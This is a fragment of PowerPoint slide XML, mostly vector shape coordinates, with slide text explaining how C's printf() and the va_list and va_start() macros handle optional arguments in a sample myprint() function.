                  <a:lnTo>
                    <a:pt x="112" y="81"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="68"/>
                    <a:pt x="113" y="35"/>
                    <a:pt x="113" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="16"/>
                    <a:pt x="113" y="0"/>
                    <a:pt x="97" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="0"/>
                    <a:pt x="80" y="16"/>
                    <a:pt x="80" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="35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5"/>
                    <a:pt x="20" y="45"/>
                    <a:pt x="16" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="45"/>
                    <a:pt x="0" y="54"/>
                    <a:pt x="0" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="71"/>
                    <a:pt x="5" y="74"/>
                    <a:pt x="12" y="78"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="66" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="136"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="140"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="155"/>
                    <a:pt x="0" y="169"/>
                    <a:pt x="20" y="169"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="82" y="133"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="146"/>
                    <a:pt x="80" y="179"/>
                    <a:pt x="80" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="198"/>
                    <a:pt x="80" y="215"/>
                    <a:pt x="97" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="215"/>
                    <a:pt x="113" y="198"/>
                    <a:pt x="113" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="179"/>
                    <a:pt x="113" y="146"/>
                    <a:pt x="112" y="1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7" name="Freeform 933">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E99D1680-B1B1-4784-9531-58ADB9100D4F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6551613" y="4316413"/>
              <a:ext cx="90488" cy="1444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69 h 308"/>
                <a:gd name="T12" fmla="*/ 153 w 197"/>
                <a:gd name="T13" fmla="*/ 30 h 308"/>
                <a:gd name="T14" fmla="*/ 175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0 w 197"/>
                <a:gd name="T21" fmla="*/ 66 h 308"/>
                <a:gd name="T22" fmla="*/ 70 w 197"/>
                <a:gd name="T23" fmla="*/ 93 h 308"/>
                <a:gd name="T24" fmla="*/ 20 w 197"/>
                <a:gd name="T25" fmla="*/ 93 h 308"/>
                <a:gd name="T26" fmla="*/ 0 w 197"/>
                <a:gd name="T27" fmla="*/ 108 h 308"/>
                <a:gd name="T28" fmla="*/ 20 w 197"/>
                <a:gd name="T29" fmla="*/ 123 h 308"/>
                <a:gd name="T30" fmla="*/ 70 w 197"/>
                <a:gd name="T31" fmla="*/ 123 h 308"/>
                <a:gd name="T32" fmla="*/ 70 w 197"/>
                <a:gd name="T33" fmla="*/ 277 h 308"/>
                <a:gd name="T34" fmla="*/ 20 w 197"/>
                <a:gd name="T35" fmla="*/ 277 h 308"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 292 h 308"/>
                <a:gd name="T38" fmla="*/ 20 w 197"/>
                <a:gd name="T39" fmla="*/ 308 h 308"/>
                <a:gd name="T40" fmla="*/ 155 w 197"/>
                <a:gd name="T41" fmla="*/ 308 h 308"/>
                <a:gd name="T42" fmla="*/ 176 w 197"/>
                <a:gd name="T43" fmla="*/ 293 h 308"/>
                <a:gd name="T44" fmla="*/ 155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69"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="30"/>
                    <a:pt x="138" y="30"/>
                    <a:pt x="153" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="32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6"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="70" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="93"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="93"/>
                    <a:pt x="0" y="93"/>
                    <a:pt x="0" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="123"/>
                    <a:pt x="12" y="123"/>
                    <a:pt x="20" y="123"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="70" y="123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70" y="277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="277"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="277"/>
                    <a:pt x="0" y="277"/>
                    <a:pt x="0" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="308"/>
                    <a:pt x="12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8" name="Freeform 934">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7CAFB10-F98F-40BB-B070-DF334788263A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId220"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6675438" y="4357688"/>
              <a:ext cx="93663" cy="104775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8 h 223"/>
                <a:gd name="T14" fmla="*/ 102 w 204"/>
                <a:gd name="T15" fmla="*/ 31 h 223"/>
                <a:gd name="T16" fmla="*/ 170 w 204"/>
                <a:gd name="T17" fmla="*/ 108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6" y="31"/>
                    <a:pt x="102" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="31"/>
                    <a:pt x="170" y="63"/>
                    <a:pt x="170" y="108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9" name="Freeform 935">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CA2C952-BF33-4C9C-9CAA-C6C615962BBB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6789738" y="4359275"/>
              <a:ext cx="103188" cy="101600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0 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 226"/>
                <a:gd name="T5" fmla="*/ 52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0 h 218"/>
                <a:gd name="T12" fmla="*/ 94 w 226"/>
                <a:gd name="T13" fmla="*/ 23 h 218"/>
                <a:gd name="T14" fmla="*/ 74 w 226"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 20 w 226"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 226"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 20 w 226"/>
                <a:gd name="T21" fmla="*/ 33 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 226"/>
                <a:gd name="T23" fmla="*/ 33 h 218"/>
                <a:gd name="T24" fmla="*/ 60 w 226"/>
                <a:gd name="T25" fmla="*/ 187 h 218"/>
                <a:gd name="T26" fmla="*/ 20 w 226"/>
                <a:gd name="T27" fmla="*/ 187 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 226"/>
                <a:gd name="T29" fmla="*/ 202 h 218"/>
                <a:gd name="T30" fmla="*/ 20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7 h 218"/>
                <a:gd name="T38" fmla="*/ 94 w 226"/>
                <a:gd name="T39" fmla="*/ 187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6" y="52"/>
                    <a:pt x="226" y="44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4" y="187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0" name="Freeform 936">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0604CFF1-9AAD-4A0E-BEB5-01C77E12AA47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6900863" y="4359275"/>
              <a:ext cx="119063" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 57 w 259"/>
                <a:gd name="T1" fmla="*/ 18 h 218"/>
                <a:gd name="T2" fmla="*/ 37 w 259"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21 w 259"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 259"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 29 w 259"/>
                <a:gd name="T9" fmla="*/ 33 h 218"/>
                <a:gd name="T10" fmla="*/ 29 w 259"/>
                <a:gd name="T11" fmla="*/ 187 h 218"/>
                <a:gd name="T12" fmla="*/ 0 w 259"/>
                <a:gd name="T13" fmla="*/ 203 h 218"/>
                <a:gd name="T14" fmla="*/ 21 w 259"/>
                <a:gd name="T15" fmla="*/ 218 h 218"/>
                <a:gd name="T16" fmla="*/ 64 w 259"/>
                <a:gd name="T17" fmla="*/ 218 h 218"/>
                <a:gd name="T18" fmla="*/ 85 w 259"/>
                <a:gd name="T19" fmla="*/ 203 h 218"/>
                <a:gd name="T20" fmla="*/ 57 w 259"/>
                <a:gd name="T21" fmla="*/ 187 h 218"/>
                <a:gd name="T22" fmla="*/ 57 w 259"/>
                <a:gd name="T23" fmla="*/ 98 h 218"/>
                <a:gd name="T24" fmla="*/ 97 w 259"/>
                <a:gd name="T25" fmla="*/ 30 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 259"/>
                <a:gd name="T27" fmla="*/ 71 h 218"/>
                <a:gd name="T28" fmla="*/ 116 w 259"/>
                <a:gd name="T29" fmla="*/ 187 h 218"/>
                <a:gd name="T30" fmla="*/ 94 w 259"/>
                <a:gd name="T31" fmla="*/ 203 h 218"/>
                <a:gd name="T32" fmla="*/ 114 w 259"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 152 w 259"/>
                <a:gd name="T35" fmla="*/ 218 h 218"/>
                <a:gd name="T36" fmla="*/ 172 w 259"/>
                <a:gd name="T37" fmla="*/ 203 h 218"/>
                <a:gd name="T38" fmla="*/ 144 w 259"/>
                <a:gd name="T39" fmla="*/ 187 h 218"/>
                <a:gd name="T40" fmla="*/ 144 w 259"/>
                <a:gd name="T41" fmla="*/ 98 h 218"/>
                <a:gd name="T42" fmla="*/ 185 w 259"/>
                <a:gd name="T43" fmla="*/ 30 h 218"/>
                <a:gd name="T44" fmla="*/ 203 w 259"/>
                <a:gd name="T45" fmla="*/ 71 h 218"/>
                <a:gd name="T46" fmla="*/ 203 w 259"/>
                <a:gd name="T47" fmla="*/ 187 h 218"/>
                <a:gd name="T48" fmla="*/ 181 w 259"/>
                <a:gd name="T49" fmla="*/ 203 h 218"/>
                <a:gd name="T50" fmla="*/ 202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7 h 218"/>
                <a:gd name="T58" fmla="*/ 231 w 259"/>
                <a:gd name="T59" fmla="*/ 66 h 218"/>
                <a:gd name="T60" fmla="*/ 187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7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4" y="187"/>
                    <a:pt x="57" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57" y="98"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="53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3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7"/>
                    <a:pt x="249" y="187"/>
                    <a:pt x="231" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="231" y="66"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="56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1" name="Freeform 937">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1650310F-16C9-42DD-BAEF-31208260C0F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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7034213" y="4357688"/>
              <a:ext cx="107950" cy="10477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7 h 223"/>
                <a:gd name="T12" fmla="*/ 85 w 234"/>
                <a:gd name="T13" fmla="*/ 0 h 223"/>
                <a:gd name="T14" fmla="*/ 13 w 234"/>
                <a:gd name="T15" fmla="*/ 37 h 223"/>
                <a:gd name="T16" fmla="*/ 36 w 234"/>
                <a:gd name="T17" fmla="*/ 59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1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59"/>
                    <a:pt x="36" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="59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2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1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2" name="Freeform 938">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1B93DCE-8CC3-44DD-9F0B-474BDEE0ACB4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7148513" y="4330700"/>
              <a:ext cx="96838" cy="1317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3 w 211"/>
                <a:gd name="T15" fmla="*/ 21 h 280"/>
                <a:gd name="T16" fmla="*/ 63 w 211"/>
                <a:gd name="T17" fmla="*/ 62 h 280"/>
                <a:gd name="T18" fmla="*/ 20 w 211"/>
                <a:gd name="T19" fmla="*/ 62 h 280"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 77 h 280"/>
                <a:gd name="T22" fmla="*/ 20 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 280"/>
                <a:gd name="T24" fmla="*/ 63 w 211"/>
                <a:gd name="T25" fmla="*/ 92 h 280"/>
                <a:gd name="T26" fmla="*/ 63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1"/>
                    <a:pt x="63" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="63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3" name="Freeform 939">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA4A9306-46B2-4089-9D74-4FFA6DF47043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7304088" y="4430713"/>
              <a:ext cx="38100" cy="61913"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 51 w 83"/>
                <a:gd name="T1" fmla="*/ 61 h 132"/>
                <a:gd name="T2" fmla="*/ 14 w 83"/>
                <a:gd name="T3" fmla="*/ 102 h 132"/>
                <a:gd name="T4" fmla="*/ 0 w 83"/>
                <a:gd name="T5" fmla="*/ 116 h 132"/>
                <a:gd name="T6" fmla="*/ 16 w 83"/>
                <a:gd name="T7" fmla="*/ 132 h 132"/>
                <a:gd name="T8" fmla="*/ 83 w 83"/>
                <a:gd name="T9" fmla="*/ 50 h 132"/>
                <a:gd name="T10" fmla="*/ 42 w 83"/>
                <a:gd name="T11" fmla="*/ 0 h 132"/>
                <a:gd name="T12" fmla="*/ 10 w 83"/>
                <a:gd name="T13" fmla="*/ 31 h 132"/>
                <a:gd name="T14" fmla="*/ 41 w 83"/>
                <a:gd name="T15" fmla="*/ 63 h 132"/>
                <a:gd name="T16" fmla="*/ 51 w 83"/>
                <a:gd name="T17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51" y="61"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="44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8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  <a:cubicBezTo>
                    <a:pt x="83" y="20"/>
                    <a:pt x="64" y="0"/>
                    <a:pt x="42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44" y="63"/>
                    <a:pt x="48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4" name="Freeform 940">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{371C0D06-81F4-409F-9D87-6E574AB6335D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7548563" y="4430713"/>
              <a:ext cx="28575" cy="30163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 63 w 63"/>
                <a:gd name="T1" fmla="*/ 32 h 63"/>
                <a:gd name="T2" fmla="*/ 32 w 63"/>
                <a:gd name="T3" fmla="*/ 0 h 63"/>
                <a:gd name="T4" fmla="*/ 0 w 63"/>
                <a:gd name="T5" fmla="*/ 31 h 63"/>
                <a:gd name="T6" fmla="*/ 31 w 63"/>
                <a:gd name="T7" fmla="*/ 63 h 63"/>
                <a:gd name="T8" fmla="*/ 63 w 63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3" y="47"/>
                    <a:pt x="63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5" name="Freeform 941">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5A693A4-DD63-4320-BDE8-13D68A4C0CF9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7669213" y="4430713"/>
              <a:ext cx="28575" cy="30163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 32 h 63"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 63"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 63"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 63 h 63"/>
                <a:gd name="T8" fmla="*/ 62 w 62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62" y="32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2" y="47"/>
                    <a:pt x="62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6" name="Freeform 942">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B348612A-9AB4-4FA9-8CA3-8EE6A6EA7F79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7788275" y="4430713"/>
              <a:ext cx="30163" cy="30163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 63 w 63"/>
                <a:gd name="T1" fmla="*/ 32 h 63"/>
                <a:gd name="T2" fmla="*/ 32 w 63"/>
                <a:gd name="T3" fmla="*/ 0 h 63"/>
                <a:gd name="T4" fmla="*/ 0 w 63"/>
                <a:gd name="T5" fmla="*/ 31 h 63"/>
                <a:gd name="T6" fmla="*/ 31 w 63"/>
                <a:gd name="T7" fmla="*/ 63 h 63"/>
                <a:gd name="T8" fmla="*/ 63 w 63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3" y="47"/>
                    <a:pt x="63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7" name="Freeform 943">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC722686-EEE8-446B-9318-851FC9C1F455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7883525" y="4297363"/>
              <a:ext cx="60325" cy="182563"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 132 w 132"/>
                <a:gd name="T1" fmla="*/ 194 h 387"/>
                <a:gd name="T2" fmla="*/ 91 w 132"/>
                <a:gd name="T3" fmla="*/ 65 h 387"/>
                <a:gd name="T4" fmla="*/ 16 w 132"/>
                <a:gd name="T5" fmla="*/ 0 h 387"/>
                <a:gd name="T6" fmla="*/ 0 w 132"/>
                <a:gd name="T7" fmla="*/ 14 h 387"/>
                <a:gd name="T8" fmla="*/ 8 w 132"/>
                <a:gd name="T9" fmla="*/ 27 h 387"/>
                <a:gd name="T10" fmla="*/ 97 w 132"/>
                <a:gd name="T11" fmla="*/ 194 h 387"/>
                <a:gd name="T12" fmla="*/ 12 w 132"/>
                <a:gd name="T13" fmla="*/ 359 h 387"/>
                <a:gd name="T14" fmla="*/ 0 w 132"/>
                <a:gd name="T15" fmla="*/ 373 h 387"/>
                <a:gd name="T16" fmla="*/ 16 w 132"/>
                <a:gd name="T17" fmla="*/ 387 h 387"/>
                <a:gd name="T18" fmla="*/ 132 w 132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4"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="135"/>
                    <a:pt x="109" y="90"/>
                    <a:pt x="91" y="65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2"/>
                    <a:pt x="6" y="25"/>
                    <a:pt x="8" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="81"/>
                    <a:pt x="97" y="162"/>
                    <a:pt x="97" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="244"/>
                    <a:pt x="79" y="313"/>
                    <a:pt x="12" y="359"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="364"/>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="377"/>
                    <a:pt x="3" y="387"/>
                    <a:pt x="16" y="387"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="387"/>
                    <a:pt x="132" y="322"/>
                    <a:pt x="132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8" name="Freeform 944">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4791FE6D-1661-4EE3-8FE6-A3722B89159B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8024813" y="4359275"/>
              <a:ext cx="34925" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 72 w 74"/>
                <a:gd name="T1" fmla="*/ 31 h 284"/>
                <a:gd name="T2" fmla="*/ 41 w 74"/>
                <a:gd name="T3" fmla="*/ 0 h 284"/>
                <a:gd name="T4" fmla="*/ 10 w 74"/>
                <a:gd name="T5" fmla="*/ 31 h 284"/>
                <a:gd name="T6" fmla="*/ 40 w 74"/>
                <a:gd name="T7" fmla="*/ 62 h 284"/>
                <a:gd name="T8" fmla="*/ 72 w 74"/>
                <a:gd name="T9" fmla="*/ 31 h 284"/>
                <a:gd name="T10" fmla="*/ 42 w 74"/>
                <a:gd name="T11" fmla="*/ 215 h 284"/>
                <a:gd name="T12" fmla="*/ 10 w 74"/>
                <a:gd name="T13" fmla="*/ 255 h 284"/>
                <a:gd name="T14" fmla="*/ 0 w 74"/>
                <a:gd name="T15" fmla="*/ 268 h 284"/>
                <a:gd name="T16" fmla="*/ 16 w 74"/>
                <a:gd name="T17" fmla="*/ 284 h 284"/>
                <a:gd name="T18" fmla="*/ 74 w 74"/>
                <a:gd name="T19" fmla="*/ 201 h 284"/>
                <a:gd name="T20" fmla="*/ 40 w 74"/>
                <a:gd name="T21" fmla="*/ 152 h 284"/>
                <a:gd name="T22" fmla="*/ 10 w 74"/>
                <a:gd name="T23" fmla="*/ 183 h 284"/>
                <a:gd name="T24" fmla="*/ 42 w 74"/>
                <a:gd name="T25" fmla="*/ 21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84">
                  <a:moveTo>
                    <a:pt x="72" y="31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49"/>
                    <a:pt x="24" y="62"/>
                    <a:pt x="40" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="62"/>
                    <a:pt x="72" y="47"/>
                    <a:pt x="72" y="31"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="42" y="215"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="241"/>
                    <a:pt x="17" y="251"/>
                    <a:pt x="10" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="256"/>
                    <a:pt x="0" y="260"/>
                    <a:pt x="0" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="275"/>
                    <a:pt x="7" y="284"/>
                    <a:pt x="16" y="284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="284"/>
                    <a:pt x="74" y="257"/>
                    <a:pt x="74" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="168"/>
                    <a:pt x="59" y="152"/>
                    <a:pt x="40" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="152"/>
                    <a:pt x="10" y="166"/>
                    <a:pt x="10" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="197"/>
                    <a:pt x="18" y="215"/>
                    <a:pt x="42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23300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1C5D-6FBB-4EAC-A557-8823B052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definition of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>() function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3BB4-79C3-4E4E-BA8D-14B4D0E8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NZ" dirty="0"/>
              <a:t> – To print out a string according to a format.</a:t>
            </a:r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r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>The argument list of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/>
              <a:t> consists of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>One concrete argument format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>Zero or more optional arguments</a:t>
            </a:r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r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>Hence, compilers do not complain if less arguments are passed to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/>
              <a:t> during invocation.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3121-3458-4B22-852E-EA94ADD9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F8041-644A-4472-865E-70B40EEC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66" y="1475192"/>
            <a:ext cx="371526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FA3E-853C-4D02-808B-8FBDDAD0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Access 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050C-00DA-4191-A24B-8AEFA6B0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4714277" cy="376310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myprint()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> shows how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actually works.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Consider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>myprint()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is invoked in line 7.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/>
              <a:t>va_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pointer (line 1) accesses the optional arguments.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/>
              <a:t>va_start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u="sng" dirty="0"/>
              <a:t>macro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (line 2) calculates the initial position of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>va_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> based on the second argument </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Narg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (last argument before the optional arguments begin)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CF4C-84B8-4C9F-8C6D-48B0508E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EE7D8-3B76-4EB0-9810-D8BADC54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01" y="753015"/>
            <a:ext cx="4063963" cy="394536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16ED197-2703-404C-BF7A-81B93F711133}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8742556" y="1880838"/>
            <a:ext cx="141249" cy="14124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90205A-38B5-4291-8E3A-2370D445D8EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8742556" y="2204642"/>
            <a:ext cx="141249" cy="14124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37771-A085-4BE1-AF3B-093D999B8076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8742556" y="2565335"/>
            <a:ext cx="141249" cy="14124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A1AB6F-7B5F-4D79-AB01-CACBE58FE7A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8742556" y="2772229"/>
            <a:ext cx="141249" cy="14124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650928-D2B3-4179-9280-AE58251385EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8742556" y="3133835"/>
            <a:ext cx="141249" cy="14124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2C02B9-0DF5-4F66-B022-4EA96F8BF48D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8742556" y="3778778"/>
            <a:ext cx="141249" cy="14124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C44AAD-C4E6-49E0-A7BF-F0AB2F5C437A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8742556" y="3985672"/>
            <a:ext cx="141249" cy="14124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727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6A02-79A7-4608-B3EC-DDA105A7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Access optional arguments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F881-6E02-46D5-85F5-831BDC35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5506608" cy="376310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va_start()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> macro gets the start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Narg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, finds the size based on the data type and sets the value for </a:t>
            </a:r>
            <a:r>
